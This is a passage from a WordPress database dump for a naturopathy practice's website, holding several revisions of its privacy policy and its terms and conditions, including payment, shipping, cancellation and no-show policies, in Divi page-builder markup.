knowingly collect Personal Data from anyone under 18 without parent or guardian consent. If we become aware that a child under 18 has provided us with Personal Data without parent or guardian consent, we will delete that information as quickly as possible. If you are the parent or guardian of a child and you believe they have provided us with Personal Data without your consent, then please contact us. We seek to ensure that the personal information we collect about you is accurate, up-to-date, relevant and complete.To assist us with this, we encourage you to contact us if you believe that any information we hold about you is inaccurate, out of date, incomplete, irrelevant or misleading.</p>\n<h1><strong>HOW WE USE YOUR INFORMATION</strong></h1>\n<p>We collect, hold, use and potentially disclose the information we collect from you for the following purposes; to maintain our business records and run our business, to contact you, for any purpose required or permitted by law, for any purpose you would otherwise reasonably expect, for any purpose disclosed to you and to which you have consented, to provide you with any technical support, to notify you of any updates and offers, to share useful content, to help us measure customer satisfaction, and to provide you with a personalised website experience.</p>\n<p>Marketing communications are only sent to you if you have requested or subscribed to them. You can opt out of our marketing communications at any time by unsubscribing or emailing us - your request will be actioned immediately.</p>\n<p>Any information you choose to make publicly available, such as blog comments will be available for others to see. If you subsequently remove this information, copies may remain viewable in cached and archived pages on other websites or if others have copied or saved the information.</p>\n<h1><strong>STORAGE AND SECURITY OF YOUR INFORMATION</strong></h1>\n<p>We will use all reasonable means to protect the confidentiality of your Personal Data while in our possession or control. All information we receive from you is stored and protected on our secure servers from unauthorized use or access. We hold your personal information in both paper-based and electronic files, in both cases stored securely. We seek to ensure that your personal information is protected from misuse, interference and loss; and unauthorised access, modification and disclosure. The personal information that we hold is treated as confidential and only accessed when necessary.</p>\n<p>We retain your personal information for as long as needed to provide services to you and as otherwise necessary to comply with our legal obligations, resolve disputes and enforce our agreements. In the event there is a breach of our security and your Personal Data is compromised, we will promptly notify you in compliance with the applicable law. </p>\n<h1><strong>SHARING YOUR INFORMATION <span style=\"font-family: \'Playfair Display\';\">WITH</span> THIRD PARTIES</strong></h1>\n<p>We do not and will not sell or deal any Personal Data or any customer information.</p>\n<p>Your Personal Data details are only disclosed to third party suppliers when it is required by law, for goods or services which you have purchased, for payment processing or to protect our copyright, trademarks and other legal rights. To the extent that we do share your Personal Data with a service provider, we would only do so if that party has agreed to comply with our privacy standards as described in this privacy policy and in accordance with applicable law. Our contracts with third parties prohibit them from using any of your Personal Data for any purpose other than that for which it was shared. </p>\n<h1><strong>DISCLOSURE OF YOUR INFORMATION</strong></h1>\n<p>We may from time to time need to disclose certain information, which may include your Personal Data, to comply with a legal requirement, such as a law, regulation, court order, subpoena, warrant, in the course of a legal proceeding or in response to a law enforcement agency request. Also, we may use your Personal Data to protect the rights, property or safety of Verde Naturopathy, our customers or third parties. If there is a change of control in one of our businesses (whether by merger, sale, transfer of assets or otherwise) customer information, which may include your Personal Data, could be transferred to a purchaser under a confidentiality agreement. We would only disclose your Personal Data in good faith and where required by any of the above circumstances. </p>\n<p>From time to time, we may also disclose your Personal Data to others involved in your health care, including doctors and specialists outside Verde Naturopathy, who may be involved in treating you, pathology services, radiology services and in emergency situations. This may occur through referral to other doctors or specialists, or for medical tests and in the reports or results returned to us following the referrals. This will always be in accordance with your consent.</p>\n<p>Typically, we only transfer your personal information overseas with your consent. The country in which the recipient is located is therefore determined by your consent.</p>\n<h1><strong>LINKS TO OTHER WEBSITES</strong></h1>\n<p>This website may contain links to other websites. These links are meant for your convenience only. Links to third party websites do not constitute sponsorship or endorsement or approval of these websites. Please be aware that we are not responsible for the privacy practices of such other websites. We encourage our users to be aware, when they leave our website, to read the privacy statements of each and every website that collects personally identifiable information. This privacy policy applies solely to information collected by this website.</p>\n<h1><strong>CHANGE IN PRIVACY POLICY</strong></h1>\n<p>As we plan to ensure our privacy policy remains current, this policy is subject to change. We may modify this policy at any time, in our sole discretion and all modifications will be effective immediately upon our posting of the modifications on this website. Please return periodically to review our privacy policy.</p>\n<h1><strong>CONTACT US</strong></h1>\n<p>If you have any questions or concerns at any time about our privacy policy or the use of your Personal Data, please contact us at hello@verdenaturopathy.com.au </p>\n<h1><strong>PERSONAL AND HEALTH INFORMATION COLLECTION STATEMENT </strong></h1>\n<p>Verde Naturopathy (“us”, “we”, “our”) only collect the information we need in order to perform our services (“Services”). We comply at all times with the Australian Privacy law which regulates how personal information is handled including all your health details which are considered sensitive information (‘Personal Sensitive Information’). We will not disclose your Personal Sensitive Information without your consent unless required due to a medical emergency, injury, health risk or similar and we will only do so to a qualified professional who is under the same duty of confidentiality. You may contact us by writing to Melissa Cann, hello@verdenaturopathy.com.au and you have the right to gain access to the information held by Verde Naturopathy about you. Our Privacy Policy on our website contains information on how you may request access to, and correction of, any of the information we hold about you including your Personal Sensitive Information and how you may complain about a breach of your privacy as well as how we will deal with a complaint. By providing us with this Personal Sensitive Information, you acknowledge and agree that the information you are providing to us is true and correct at the time you are providing it to us. You will notify us with any changes and keep it updated on a regular basis while you are using our Services. You can access your Personal Sensitive Information by request at any time. We keep your Personal Sensitive Information secure and do not use it for any purposes unrelated to our Services. From time to time, we may use your Personal Sensitive Information to contact you in relation to information on our Services. You can unsubscribe at any time or advise us that you withdraw your consent to these specific uses and be removed from any further marketing or information we may send.</p>\n<p>Important Note: Our Services are not a substitute for medical doctor attention, treatment, examination, advice or diagnosis. You are responsible for consulting a medical doctor before commencing any new regimes or alterations to your health. You take full responsibility for making the informed decision to use our Services. You hereby agree to irrevocably release and waive any claims you may have now or in the future against us.</p>\n<p><em>Updated May 2021</em></p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2021-05-25 21:44:13','2021-05-25 13:44:13','',3,'https://verde.desidrivers.com.au/?p=158',0,'revision','',0),(165,1,'2021-05-26 14:22:32','2021-05-26 06:22:32','','holistic-healer-02','','inherit','open','closed','','holistic-healer-02','','','2021-05-26 14:22:32','2021-05-26 06:22:32','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-02.jpg',0,'attachment','image/jpeg',0),(182,1,'2021-05-26 20:02:19','2021-05-26 12:02:19','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" inline_fonts=\"Playfair Display SC,Playfair Display,Montserrat\" sticky_enabled=\"0\"]<!-- divi:paragraph -->\n<h1 style=\"text-align: center;\"><span style=\"font-family: \'Playfair Display SC\';\"><strong>Terms & Conditions</strong></span></h1>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\">Please be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.</span></p>\n<p><span style=\"font-family: Montserrat;\">Your health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.</span></p>\n<p> </p>\n<h2><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\" font-family:=\"\" playfair=\"\" display=\"\" sc=\"\">Our Responsibility</span></strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Melissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Your responsibility</span></strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Your health & safety is our priority & therefore we ask that you fill out a <u>Client Intake Form</u> prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. </span></p>\n<p><span style=\"font-family: Montserrat;\">During a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is your responsibility to inform us of any changes in your health status throughout your future treatments with us.</span></p>\n<p><span style=\"font-family: Montserrat;\">Please notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.</span></p>\n<p><span style=\"font-family: Montserrat;\">If you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.</span></p>\n<p> </p>\n<h2><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Payment Terms</strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Payment for face-to-face consults is required at the completion of the appointment. A 50% deposit is required for online consults at the time of booking. Should you need to cancel your booking, this will be refunded if more than 24 hours’ notice is provided. The deposit is forfeited if the booking is cancelled with less than 24 hours’ notice.</span></p>\n<p><span style=\"font-family: Montserrat;\">Payments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Shipping</span></strong></span></h3>\n<p>Online consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.</p>\n<p>A flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.</p>\n<p>All consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.</p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Order fulfilment through vital.ly</span></strong></span></h3>\n<p>Often, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Online Consultations</strong></span></h4>\n<p>Online consults will be conducted via Zoom. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.<br />On the day of the appointment, click the Zoom link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.<br />For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.</p>\n<p> </p>\n<h3><strong><span style=\"font-family: \'Playfair Display SC\';\">Change of mind</span></strong></h3>\n<p>We do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Cancellations and Reschedules</strong></span></h4>\n<p>Please respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.</p>\n<p>Clients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided <em><u>24 hours notice</u></em> is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with less than 24 hours notice, you may be charged a <u>Late Cancellation Fee</u> equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.</p>\n<p>Extenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>No-shows</strong></span></h4>\n<p>No-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, <u>after 2 unattended appointments</u> you will be required to pay the <u>full session fee</u> at the time of booking to secure a new appointment.</p>\n<p>Your understanding of this policy is appreciated.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Confidentiality and Privacy</strong></span></h4>\n<p>Please view our privacy policy for more details.</p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','T&C','','inherit','closed','closed','','2-revision-v1','','','2021-05-26 20:02:19','2021-05-26 12:02:19','',2,'https://verde.desidrivers.com.au/?p=182',0,'revision','',0),(180,1,'2021-05-26 20:00:38','2021-05-26 12:00:38','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" inline_fonts=\"Playfair Display SC,Playfair Display,Montserrat\"]<!-- divi:paragraph -->\n<h1 style=\"text-align: center;\"><span style=\"font-family: \'Playfair Display SC\';\"><strong>Terms & Conditions</strong></span></h1>\n<p> </p>\n<p><span style=\"font-family: Montserrat; \">Please be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.</span></p>\n<p><span style=\"font-family: Montserrat; \">Your health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.</span></p>\n<p> </p>\n<h2><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\" font-family:=\"\" playfair=\"\" display=\"\" sc=\"\">Our Responsibility</span></strong></span></h2>\n<p><span style=\"font-family: Montserrat; \">Melissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Your responsibility</span></strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Your health & safety is our priority & therefore we ask that you fill out a <u>Client Intake Form</u> prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. </span></p>\n<p><span style=\"font-family: Montserrat;\">During a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is your responsibility to inform us of any changes in your health status throughout your future treatments with us.</span></p>\n<p><span style=\"font-family: Montserrat;\">Please notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.</span></p>\n<p><span style=\"font-family: Montserrat;\">If you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.</span></p>\n<p> </p>\n<h2><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Payment Terms</strong></span></h2>\n<p><span style=\"font-family: Montserrat; \">Payment for face-to-face consults is required at the completion of the appointment. A 50% deposit is required for online consults at the time of booking. Should you need to cancel your booking, this will be refunded if more than 24 hours’ notice is provided. The deposit is forfeited if the booking is cancelled with less than 24 hours’ notice.</span></p>\n<p><span style=\"font-family: Montserrat; \">Payments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Shipping</span></strong></span></h3>\n<p>Online consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.</p>\n<p>A flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.</p>\n<p>All consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.</p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Order fulfilment through vital.ly</span></strong></span></h3>\n<p>Often, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Online Consultations</strong></span></h4>\n<p>Online consults will be conducted via Zoom. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.<br />On the day of the appointment, click the Zoom link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.<br />For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.</p>\n<p> </p>\n<h3><strong><span style=\"font-family: \'Playfair Display SC\';\">Change of mind</span></strong></h3>\n<p>We do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Cancellations and Reschedules</strong></span></h4>\n<p>Please respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.</p>\n<p>Clients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided <em><u>24 hours notice</u></em> is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with less than 24 hours notice, you may be charged a <u>Late Cancellation Fee</u> equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.</p>\n<p>Extenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>No-shows</strong></span></h4>\n<p>No-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, <u>after 2 unattended appointments</u> you will be required to pay the <u>full session fee</u> at the time of booking to secure a new appointment.</p>\n<p>Your understanding of this policy is appreciated.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Confidentiality and Privacy</strong></span></h4>\n<p>Please view our privacy policy for more details.</p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','T&C','','inherit','closed','closed','','2-revision-v1','','','2021-05-26 20:00:38','2021-05-26 12:00:38','',2,'https://verde.desidrivers.com.au/?p=180',0,'revision','',0),(162,1,'2021-05-25 22:04:13','2021-05-25 14:04:13','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" inline_fonts=\"Playfair Display SC,Playfair Display,Montserrat\" sticky_enabled=\"0\"]<!-- divi:paragraph -->\n<h1 style=\"text-align: center;\"><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Terms & Conditions</strong></span></h1>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Please be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Your health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.</span></p>\n<p> </p>\n<h2><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\" font-family:=\"\" playfair=\"\" display=\"\" sc=\"\">Our Responsibility</span></strong></span></h2>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Melissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Your responsibility</span></strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Your health & safety is our priority & therefore we ask that you fill out a <u>Client Intake Form</u> prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. </span></p>\n<p><span style=\"font-family: Montserrat;\">During a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is your responsibility to inform us of any changes in your health status throughout your future treatments with us.</span></p>\n<p><span style=\"font-family: Montserrat;\">Please notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.</span></p>\n<p><span style=\"font-family: Montserrat;\">If you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.</span></p>\n<p> </p>\n<h2><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Payment Terms</strong></span></h2>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Payment for face-to-face consults is required at the completion of the appointment. A 50% deposit is required for online consults at the time of booking. Should you need to cancel your booking, this will be refunded if more than 24 hours’ notice is provided. The deposit is forfeited if the booking is cancelled with less than 24 hours’ notice.</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Payments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Shipping</span></strong></span></h3>\n<p>Online consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.</p>\n<p>A flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.</p>\n<p>All consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.</p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Order fulfilment through vital.ly</span></strong></span></h3>\n<p>Often, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Online Consultations</strong></span></h4>\n<p>Online consults will be conducted via Zoom. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.<br />On the day of the appointment, click the Zoom link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.<br />For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.</p>\n<p> </p>\n<h3><strong><span style=\"font-family: \'Playfair Display SC\';\">Change of mind</span></strong></h3>\n<p>We do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Cancellations and Reschedules</strong></span></h4>\n<p>Please respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.</p>\n<p>Clients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided <em><u>24 hours notice</u></em> is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with less than 24 hours notice, you may be charged a <u>Late Cancellation Fee</u> equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.</p>\n<p>Extenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>No-shows</strong></span></h4>\n<p>No-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, <u>after 2 unattended appointments</u> you will be required to pay the <u>full session fee</u> at the time of booking to secure a new appointment.</p>\n<p>Your understanding of this policy is appreciated.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Confidentiality and Privacy</strong></span></h4>\n<p>Please view our privacy policy for more details.</p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Sample Page','','inherit','closed','closed','','2-revision-v1','','','2021-05-25 22:04:13','2021-05-25 14:04:13','',2,'https://verde.desidrivers.com.au/?p=162',0,'revision','',0),(189,1,'2021-05-26 20:09:45','2021-05-26 12:09:45','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.4.8\" background_color=\"#f9f3eb\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(249,243,235,0.8)\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||170px||false|false\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" 